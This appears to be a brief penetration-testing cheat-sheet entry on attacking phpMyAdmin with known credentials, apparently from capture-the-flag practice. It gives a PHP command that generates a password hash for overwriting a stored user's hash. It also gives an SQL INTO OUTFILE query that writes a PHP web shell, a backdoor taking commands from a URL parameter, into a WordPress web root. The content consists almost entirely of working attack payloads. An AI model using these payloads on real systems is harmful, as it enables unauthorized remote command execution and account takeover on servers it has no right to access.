PHPMyAdmin

Requires: Credentials to login

Password Alteration

  • Change the password hash of the stored user - IPPSEC​
php -a
echo password_hash('dnoscp', PASSWORD_DEFAULT);

RCE via SQL

  • SQL into outfile wirte method leads to SHELL ( change the outfile based on CMS )
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"

Machine: